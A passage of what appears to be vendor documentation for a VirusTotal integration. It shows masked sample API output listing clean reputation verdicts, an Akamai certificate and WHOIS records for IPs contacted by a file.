"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"Forcepoint ThreatSeeker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"Fortinet": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Fortinet"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
}
},
"reputation": 0,
"last_modification_date": 1625850459,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"last_https_certificate": {
"size": 1326,
"public_key": {
"ec": {
"oid": "*****",
"pub": "*****"
},
"algorithm": "EC"
},
"thumbprint_sha256": "*****",
"tags": [],
"cert_signature": {
"signature": "*****",
"signature_algorithm": "sha256ECDSA"
},
"validity": {
"not_after": "2021-09-13 12:00:00",
"not_before": "2020-07-15 00:00:00"
},
"version": "V3",
"extensions": {
"certificate_policies": [
"2.16.840.1.114412.1.1",
"2.23.140.1.2.2"
],
"extended_key_usage": [
"serverAuth",
"clientAuth"
],
"authority_key_identifier": {
"keyid": "*****"
},
"subject_alternative_name": [
"a248.e.akamai.net",
"*.akamaized.net",
"*.akamaihd-staging.net",
"*.akamaihd.net",
"*.akamaized-staging.net"
],
"tags": [],
"subject_key_identifier": "*****",
"crl_distribution_points": [
"http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl",
"http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl"
],
"key_usage": [
"ff"
],
"1.3.6.1.4.1.11129.2.4.2": "*****",
"CA": true,
"ca_information_access": {
"CA Issuers": "http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt",
"OCSP": "http://ocsp.digicert.com"
}
},
"signature_algorithm": "sha256ECDSA",
"serial_number": "*****",
"thumbprint": "*****",
"issuer": {
"C": "US",
"CN": "DigiCert Secure Site ECC CA-1",
"O": "DigiCert Inc",
"OU": "www.digicert.com"
},
"subject": {
"C": "US",
"ST": "Massachusetts",
"CN": "a248.e.akamai.net",
"O": "Akamai Technologies, Inc.",
"L": "Cambridge"
}
},
"continent": "NA",
"whois": " Domain Name: AKAMAITECHNOLOGIES.COM\r\n Registry Domain ID: *****\r\n Registrar WHOIS Server: whois.akamai.com\r\n Registrar URL: http://www.akamai.com\r\n Updated Date: 2020-08-20T18:59:45Z\r\n Creation Date: 1998-08-18T04:00:00Z\r\n Registry Expiry Date: 2022-08-17T04:00:00Z\r\n Registrar: Akamai Technologies, Inc.\r\n Registrar IANA ID: 2480\r\n Registrar Abuse Contact Email: *****@*****.***\r\n Registrar Abuse Contact Phone: +1.*****\r\n Domain Status: clientDeleteProhibited https://icann.org/*****\r\n Domain Status: clientTransferProhibited https://icann.org/*****\r\n Domain Status: clientUpdateProhibited https://icann.org/*****\r\n Domain Status: serverDeleteProhibited https://icann.org/*****\r\n Domain Status: serverTransferProhibited https://icann.org/*****\r\n Domain Status: serverUpdateProhibited https://icann.org/*****\r\n Name Server: AX0.AKAMAISTREAM.NET\r\n Name Server: AX1.AKAMAISTREAM.NET\r\n Name Server: AX2.AKAMAISTREAM.NET\r\n Name Server: AX3.AKAMAISTREAM.NET\r\n Name Server: NS2-32.AKAMAISTREAM.NET\r\n Name Server: NS3-32.AKAMAISTREAM.NET\r\n Name Server: NS6-32.AKAMAISTREAM.NET\r\n Name Server: P5.AKAMAISTREAM.NET\r\n Name Server: P6.AKAMAISTREAM.NET\r\n Name Server: P7.AKAMAISTREAM.NET\r\n Name Server: P8.AKAMAISTREAM.NET\r\n DNSSEC: unsigned\r\n URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/*****/\r\n>>> Last update of whois database: 2021-06-26T08:18:02Z <<<\r\n\r\nFor more information on Whois status codes, please visit https://icann.org/epp\r\n\r\nNOTICE: The expiration date displayed in this record is the date the\r\nregistrar's sponsorship of the domain name registration in the registry is\r\ncurrently set to expire. This date does not necessarily reflect the expiration\r\ndate of the domain name registrant's agreement with the sponsoring\r\nregistrar. Users may consult the sponsoring registrar's Whois database to\r\nview the registrar's reported date of expiration for this registration.\r\n\r\nTERMS OF USE: You are not authorized to access or query our Whois\r\ndatabase through the use of electronic processes that are high-volume and\r\nautomated except as reasonably necessary to register domain names or\r\nmodify existing registrations; the Data in VeriSign Global Registry\r\nServices' (\"VeriSign\") Whois database is provided by VeriSign for\r\ninformation purposes only, and to assist persons in obtaining information\r\nabout or related to a domain name registration record. VeriSign does not\r\nguarantee its accuracy. By submitting a Whois query, you agree to abide\r\nby the following terms of use: You agree that you may use this Data only\r\nfor lawful purposes and that under no circumstances will you use this Data\r\nto: (1) allow, enable, or otherwise support the transmission of mass\r\nunsolicited, commercial advertising or solicitations via e-mail, telephone,\r\nor facsimile; or (2) enable high volume, automated, electronic processes\r\nthat apply to VeriSign (or its computer systems). The compilation,\r\nrepackaging, dissemination or other use of this Data is expressly\r\nprohibited without the prior written consent of VeriSign. You agree not to\r\nuse electronic processes that are automated and high-volume to access or\r\nquery the Whois database except as reasonably necessary to register\r\ndomain names or modify existing registrations. VeriSign reserves the right\r\nto restrict your access to the Whois database in its sole discretion to ensure\r\noperational stability. VeriSign may restrict or terminate your access to the\r\nWhois database for failure to abide by these terms of use. VeriSign\r\nreserves the right to modify these terms at any time.\r\n\r\nThe Registry database contains ONLY .COM, .NET, .EDU domains and\r\nRegistrars.\r\ndomain: akamaitechnologies.com\nDomainName: AKAMAITECHNOLOGIES.COM\nRegistry Domain ID: *****\nRegistrar WHOIS Server: whois.akamai.com\nRegistrar URL: http://www.akamai.com\nUpdated Date: 2020-08-20T18:59:45.0000Z\nCreation Date: 1998-08-18T04:00:00.0000Z\nRegistrar Registration Expiration Date: 2022-08-17T04:00:00.0000Z\nSponsoring Registrar: Akamai Technologies, INC.\nSponsoring Registrar IANA ID: 2480\nRegistrar Abuse Contact Email: *****@*****.***\nRegistrar Abuse Contact Phone: +1.*****\nDomain Status: clientDeleteProhibited https://icann.org/*****\nDomain Status: clientTransferProhibited https://icann.org/*****\nDomain Status: clientUpdateProhibited https://icann.org/*****\nDomain Status: serverDeleteProhibited https://icann.org/*****\nDomain Status: serverTransferProhibited https://icann.org/*****\nDomain Status: serverUpdateProhibited https://icann.org/*****\nRegistrant Name: Hostmaster Billing\nRegistrant Organization: Akamai Technologies, inc.\nRegistrant Street: 145 Broadway\nRegistrant City: Cambridge\nRegistrant State/Province: MA\nRegistrant Postal Code: 02142\nRegistrant Country: US\nRegistrant Phone: +1.6174443000\nRegistrant Phone Ext: \nRegistrant Fax: +1.6174443001\nRegistrant Fax Ext: \nRegistrant Email: hostmaster-billing@akamai.com\nAdmin Name: Hostmaster Billing\nAdmin Organization: Akamai Technologies, inc.\nAdmin Street: 145 Broadway\nAdmin City: Cambridge\nAdmin State/Province: MA\nAdmin Postal Code: 02142\nAdmin Country: US\nAdmin Phone: +1.6174443000\nAdmin Phone Ext: \nAdmin Fax: +1.6174443001\nAdmin Fax Ext: \nAdmin Email: hostmaster-billing@akamai.com\nTech Name: Hostmaster Billing\nTech Organization: Akamai Technologies, inc.\nTech Street: 145 Broadway\nTech City: Cambridge\nTech State/Province: MA\nTech Postal Code: 02142\nTech Country: US\nTech Phone: +1.6174443000\nTech Phone Ext: \nTech Fax: +1.6174443001\nTech Fax Ext: \nTech Email: hostmaster-billing@akamai.com\nBilling Name: Hostmaster Billing\nBilling Organization: Akamai Technologies, inc.\nBilling Street: 145 Broadway\nBilling City: Cambridge\nBilling State/Province: MA\nBilling Postal Code: 02142\nBilling Country: US\nBilling Phone: +1.6174443000\nBilling Phone Ext: \nBilling Fax: +1.6174443001\nBilling Fax Ext: \nBilling Email: hostmaster-billing@akamai.com\nName Server: AX0.AKAMAISTREAM.NET\nName Server: AX1.AKAMAISTREAM.NET\nName Server: AX2.AKAMAISTREAM.NET\nName Server: AX3.AKAMAISTREAM.NET\nName Server: NS2-32.AKAMAISTREAM.NET\nName Server: NS3-32.AKAMAISTREAM.NET\nName Server: NS6-32.AKAMAISTREAM.NET\nName Server: P5.AKAMAISTREAM.NET\nName Server: P6.AKAMAISTREAM.NET\nName Server: P7.AKAMAISTREAM.NET\nName Server: P8.AKAMAISTREAM.NET\nDNSSEC: unsigned\nURL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/\n>>> Last update of WHOIS database: 2021-06-26T07:55:01Z <<<\nFor more information on Whois status codes, please visit https://icann.org/epp\nNotice: By submitting a WHOIS query, you agree to abide by the following: This information\nNotice: is provided for the sole purpose of assisting you in obtaining information about\nNotice: domain name registration records and is made available on an \"AS-IS\" basis. \nNotice: Akamai Technologies makes no warranty as to the accuracy or completeness of the\nNotice: information provided by registrants for inclusion in the Akamai WHOIS database.\nNotice: You may use this data only for lawful purposes and that under no circumstances\nNotice: will you use this data to: (1) allow, enable, or otherwise support the \nNotice: transmission of mass unsolicited, commercial advertising or solicitations via\nNotice: direct mail, e-mail, telephone, or facsimile; or (2) enable high volume, \nNotice: automated, electronic processes that apply to Akamai Technologies (or its computer\nNotice: systems). Any use of this data for other purposes is prohibited without the prior \nNotice: written consent of Akamai Technologies.\n"
},
"type": "ip_address",
"id": "***.***.***.***",
"links": {
"self": "https://www.virustotal.com/api/v3/ip_addresses/***.***.***.***"
}
},
{
"attributes": {
"regional_internet_registry": "ARIN",
"network": "***.***.***.***/**",
"tags": [],
"country": "US",
"as_owner": "MICROSOFT-CORP-MSN-AS-BLOCK",
"last_analysis_stats": {
"harmless": 84,
"malicious": 0,
"suspicious": 0,
"undetected": 0,
"timeout": 0
},
"asn": 8075,
"whois_date": 1623825782,
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Comodo Valkyrie Verdict": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"SafeToOpen": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"Lumu": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lumu"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Kaspersky": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"Segasec": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Segasec"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"AutoShun": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"NotMining": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "NotMining"
},
"Cyan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Cyan"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"ESTsecurity-Threat Inside": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESTsecurity-Threat Inside"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Webroot": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Webroot"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"Netcraft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Netcraft"
},
"CRDF": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CRDF"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"Forcepoint ThreatSeeker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"StopBadware": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopBadware"
},
"Fortinet": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Fortinet"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
}
},
"reputation": 0,
"last_modification_date": 1625790901,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"continent": "NA",
"whois": "NetRange: ***.***.***.*** - ***.***.***.***\nCIDR: ***.***.***.***/**, ***.***.***.***/**, ***.***.***.***/**, ***.***.***.***/**, ***.***.***.***/**, ***.***.***.***/**, ***.***.***.***/**, ***.***.***.***/**\nNetName: MSFT\nNetHandle: NET-40-74-0-0-1\nParent: NET40 (NET-40-0-0-0-0)\nNetType: Direct Assignment\nOriginAS: \nOrganization: Microsoft Corporation (MSFT)\nRegDate: 2015-02-23\nUpdated: 2015-05-27\nRef: https://rdap.arin.net/registry/ip/***.***.***.***\nOrgName: Microsoft Corporation\nOrgId: MSFT\nAddress: One Microsoft Way\nCity: Redmond\nStateProv: WA\nPostalCode: 98052\nCountry: US\nRegDate: 1998-07-10\nUpdated: 2021-04-13\nComment: To report suspected security issues specific to traffic emanating from Microsoft online services, including the distribution of malicious content or other illicit or illegal material through a Microsoft online service, please submit reports to:\r\nComment: * https://cert.microsoft.com. \r\nComment: \r\nComment: For SPAM and other abuse issues, such as Microsoft Accounts, please contact:\r\nComment: * abuse@microsoft.com. \r\nComment: \r\nComment: To report security vulnerabilities in Microsoft products and services, please contact:\r\nComment: * secure@microsoft.com. \r\nComment: \r\nComment: For legal and law enforcement-related requests, please contact:\r\nComment: * msndcc@microsoft.com\r\nComment: \r\nComment: For routing, peering or DNS issues, please \r\nComment: contact:\r\nComment: * IOC@microsoft.com\nRef: https://rdap.arin.net/registry/entity/MSFT\nOrgDNSHandle: YSRH-ARIN\nOrgDNSName: Yalamati, Sree Raghu Harsha \nOrgDNSPhone: +917702220771 \nOrgDNSEmail: v-raghuy@microsoft.com\nOrgDNSRef: https://rdap.arin.net/registry/entity/YSRH-ARIN\nOrgTechHandle: MRPD-ARIN\nOrgTechName: Microsoft Routing, Peering, and DNS\nOrgTechPhone: +1-425-882-8080 \nOrgTechEmail: IOC@microsoft.com\nOrgTechRef: https://rdap.arin.net/registry/entity/MRPD-ARIN\nOrgTechHandle: BEDAR6-ARIN\nOrgTechName: Bedard, Dawn \nOrgTechPhone: +1-425-538-6637 \nOrgTechEmail: dabedard@microsoft.com\nOrgTechRef: https://rdap.arin.net/registry/entity/BEDAR6-ARIN\nOrgAbuseHandle: MAC74-ARIN\nOrgAbuseName: Microsoft Abuse Contact\nOrgAbusePhone: +1-425-882-8080 \nOrgAbuseEmail: abuse@microsoft.com\nOrgAbuseRef: https://rdap.arin.net/registry/entity/MAC74-ARIN\n"
},
"type": "ip_address",
"id": "***.***.***.***",
"links": {
"self": "https://www.virustotal.com/api/v3/ip_addresses/***.***.***.***"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/files/*****/contacted_ips?limit=10"
}
}
]The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
Same as Raw Data, D3 enriches the context data from the original VirusTotal API response by adding the file_hash field to indicate your input File Hashes.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
[
{
"file_hash": "*****",
"meta": {
"count": 3
},
"data": [
{
"attributes": {
"regional_internet_registry": "ARIN",
"jarm": "*****",
"network": "***.***.***.***/**",
"last_https_certificate_date": 1625850459,
"tags": [],
"country": "US",
"as_owner": "Akamai International B.V.",
"last_analysis_stats": {
"harmless": 76,
"malicious": 0,
"suspicious": 0,
"undetected": 9,
"timeout": 0
},
"asn": *****,
"whois_date": 1624695500,
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Comodo Valkyrie Verdict": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"SafeToOpen": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Kaspersky": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"Segasec": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Segasec"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"ESTsecurity-Threat Inside": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESTsecurity-Threat Inside"
},
